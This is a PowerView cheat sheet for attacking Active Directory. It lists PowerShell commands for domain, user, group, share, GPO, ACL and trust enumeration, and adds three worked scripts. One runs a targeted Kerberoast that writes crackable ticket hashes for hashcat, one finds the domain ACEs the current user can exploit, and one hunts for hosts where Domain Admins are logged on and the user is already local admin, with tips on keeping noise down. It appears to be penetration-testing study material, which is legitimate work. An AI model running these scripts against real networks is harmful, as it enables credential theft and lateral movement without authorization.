# powerview\.ps1

* [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
* [PowerView Wiki](https://powersploit.readthedocs.io/en/latest/)

```powershell
# start a shell that ignores the execution policy, then load PowerView
powershell.exe -ExecutionPolicy Bypass
Import-Module .\PowerView.ps1
# or dot-source it into the current session
. .\PowerView.ps1
```

## Domain information

```powershell
Get-Domain [-Domain DOMAIN]
Get-DomainController [-Domain DOMAIN]
Get-DomainSID
Get-DomainPolicy
# list the policy sections, then pull the one you need (password/lockout settings, Kerberos settings)
Get-DomainPolicy | Get-Member -MemberType NoteProperty
(Get-DomainPolicy)."system access"
(Get-DomainPolicy)."kerberos policy"
```

## Domain Users & Computers

```powershell
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
Get-DomainUser | select samaccountname, userprincipalname, memberof
Get-DomainUser * -Domain DOMAIN | Select-Object -Property name, samaccountname, description, memberof, admincount, userprincipalname, serviceprincipalname, useraccountcontrol
# only pull the attributes you ask for (Get-UserProperty is the older name for the same idea)
Get-DomainUser -Properties FIELD
Get-UserProperty [-Properties FIELD]

Get-DomainComputer -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
# live hosts only (ICMP ping each computer object before returning it)
Get-DomainComputer -Ping -Properties OperatingSystem, Name, DnsHostName | Sort-Object -Property DnsHostName
```

### Kerberoastable Users

```powershell
# user accounts with a servicePrincipalName set
Get-NetUser -SPN | select serviceprincipalname
# request a TGS for each of them and emit crackable hashes
Get-DomainUser * -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
```
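Worked example (added here; it is not part of the original cheat sheet or of PowerView): a Kerberoast run that drops `krbtgt` and disabled accounts before requesting tickets, shows which targets are worth the cracking time, and writes hashcat-ready lines to a file. It assumes `PowerView.ps1` is already dot-sourced and the session holds a domain logon (any authenticated user can request these tickets); the output file name is an arbitrary choice.

```powershell
# Added example: targeted Kerberoast with PowerView. Assumes PowerView.ps1 is dot-sourced
# and we run as an authenticated domain user. $OutFile is an arbitrary name of our choosing.
$OutFile = '.\kerberoast.hashcat'

# Candidate accounts: user objects carrying a servicePrincipalName. PowerView returns
# useraccountcontrol as a flags value; bit 2 is ACCOUNTDISABLE.
$Targets = Get-DomainUser -SPN -Properties samaccountname,distinguishedname,serviceprincipalname,pwdlastset,useraccountcontrol,admincount |
    Where-Object {
        ($_.samaccountname -ne 'krbtgt') -and            # krbtgt is not a practical cracking target
        ((([int]$_.useraccountcontrol) -band 2) -eq 0)   # skip disabled accounts
    }

# Triage before roasting: an old pwdlastset and admincount=1 mark the accounts worth the effort.
$Targets |
    Select-Object samaccountname, admincount, pwdlastset,
        @{ Name = 'SPN'; Expression = { @($_.serviceprincipalname)[0] } } |
    Sort-Object pwdlastset |
    Format-Table -AutoSize

# Request one TGS per account (the encryption type depends on what the service account
# supports) and keep only the hash line from each PowerView result object.
$Targets |
    Get-DomainSPNTicket -OutputFormat Hashcat |
    Select-Object -ExpandProperty Hash |
    Out-File -FilePath $OutFile -Encoding ascii

Write-Host "Wrote $(@(Get-Content $OutFile).Count) ticket hashes to $OutFile"

# Offline: hashcat -m 13100 .\kerberoast.hashcat wordlist.txt
# 13100 covers $krb5tgs$23$ (RC4) tickets; AES tickets ($krb5tgs$17$ / $krb5tgs$18$)
# need -m 19600 / -m 19700 instead.
```

Each ticket request is a 4769 event on the KDC with the requesting user as the client, so roast a handful of triaged accounts rather than every SPN in the domain when noise matters.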

## Domain Groups

```powershell
# -Identity accepts wildcards, e.g. "*admin*"
Get-DomainGroup [-Identity "GROUPNAME"]
Get-DomainGroupMember [-Identity "GROUPNAME"]
# Get-NetGroup / Get-NetGroupMember are the older names for the same functions
```

## SMB Shares

```powershell
# Invoke-ShareFinder is the older name; -CheckShareAccess only returns shares the current user can read
Find-DomainShare [-CheckShareAccess]
```

## GPO

```powershell
Get-NetGPO [| select displayname]
# GPOs that push members into local groups via Restricted Groups / Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
```

## ACLs

```powershell
# Returns the ACEs set on the specified object, with rights GUIDs resolved to names
Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs

# Search the whole domain for interesting ACEs (GenericAll, Write*, ExtendedRight, ...)
Find-InterestingDomainAcl -ResolveGUIDs

# Check the ACL on a file system path (e.g. an SMB share)
Get-PathAcl -Path "\\Path\Of\A\Share"
```
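Worked example (added here; not part of the original cheat sheet or of PowerView): `Find-InterestingDomainAcl` returns every interesting ACE in the domain, most of which belong to other principals. This script narrows the output to ACEs granted to the current user or to a group it is a member of, which is the set you can actually exploit from this session. It assumes `PowerView.ps1` is dot-sourced and the shell runs as a domain user; the variable names are arbitrary.

```powershell
# Added example: keep only the interesting ACEs the current user can exercise.
# Assumes PowerView.ps1 is dot-sourced and $env:USERNAME is a domain account.

# Principals we control: our own account plus every group we belong to.
# -MemberIdentity resolves membership through tokenGroups, so nested groups are included.
$Me       = Get-DomainUser  -Identity $env:USERNAME       -Properties samaccountname,objectsid
$MyGroups = Get-DomainGroup -MemberIdentity $env:USERNAME -Properties samaccountname,objectsid

$MyNames = @($Me.samaccountname) + @($MyGroups | ForEach-Object { $_.samaccountname })
Write-Host "Checking ACEs for: $($MyNames -join ', ')"

# Every ACE PowerView considers interesting (GenericAll, WriteDacl, WriteOwner, WriteProperty,
# allowed ExtendedRights such as User-Force-Change-Password), with GUIDs resolved.
$Aces = Find-InterestingDomainAcl -ResolveGUIDs

# IdentityReferenceName is the trustee's samaccountname after PowerView resolves the SID.
$Exploitable = $Aces | Where-Object { $MyNames -contains $_.IdentityReferenceName }

$Exploitable |
    Select-Object ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName, IdentityReferenceClass |
    Sort-Object ObjectDN |
    Format-Table -AutoSize
```

Caveat: `Find-InterestingDomainAcl` only reports trustees whose RID is 1000 or higher, so rights granted to well-known groups such as Domain Users or Authenticated Users never appear in its output even though every account holds them. Check those separately with `Get-DomainObjectAcl -ResolveGUIDs` on the objects you care about.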

## Domain Trusts

```powershell
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>

# Enumerate the trusts of the current domain, then recursively enumerate the trusts of every domain found
Get-DomainTrustMapping
```

## User Hunting

```powershell
# Find all machines in the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose

# Find members of the local Administrators group on every machine in the domain
Find-DomainLocalGroupMember -Verbose

# Find computers where a Domain Admin (or a specified user) has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName

# Confirm admin access on a single host
Test-AdminAccess
```
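Worked example (added here; not part of the original cheat sheet or of PowerView): the question behind user hunting is "where is a high-value user logged on, and can I already get onto that box to take their credentials?" This script asks PowerView that question directly for one target group and reports only the hosts that satisfy both conditions. It assumes `PowerView.ps1` is dot-sourced and the session runs as a domain user; the group name and thread count are arbitrary choices.

```powershell
# Added example: hunt for sessions of a target group's members and keep only the hosts
# where we are already local admin. Assumes PowerView.ps1 is dot-sourced.
$TargetGroup = 'Domain Admins'   # arbitrary choice; any group works

# Find-DomainUserLocation enumerates the group's members, then queries each domain computer
# for sessions (NetSessionEnum) and logged-on users (NetWkstaUserEnum). -CheckAccess also
# tests whether the current user is a local admin on every host that reports a hit.
$Hits = Find-DomainUserLocation -UserGroupIdentity $TargetGroup -CheckAccess -Threads 20

# LocalAdmin is only populated when -CheckAccess is used; $true marks a host we can act on now.
$Actionable = $Hits | Where-Object { $_.LocalAdmin -eq $true }

$Actionable |
    Select-Object UserName, ComputerName, IPAddress, SessionFromName, LocalAdmin |
    Sort-Object ComputerName, UserName -Unique |
    Format-Table -AutoSize

Write-Host "$(@($Hits).Count) session hits for $TargetGroup, $(@($Actionable).Count) on hosts where we are local admin"

# Broader but noisier: every host where we are local admin, whether or not a target is there.
$AdminHosts = Find-LocalAdminAccess -Threads 20
Write-Host "Local admin on $(@($AdminHosts).Count) hosts"
```

Two practical caveats. `-Stealth` limits the session queries to file servers, DFS servers and domain controllers, which is where most sessions concentrate, and is far quieter than touching every computer object. And `NetSessionEnum` against hosts running hardened builds (Windows 10 1709 / Server 2019 and later defaults) refuses unprivileged callers, so an empty result from a modern workstation is not evidence that nobody is logged on there.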

## References

* <https://hackersinterview.com/oscp/oscp-cheatsheet-powerview-commands>
* <https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993>
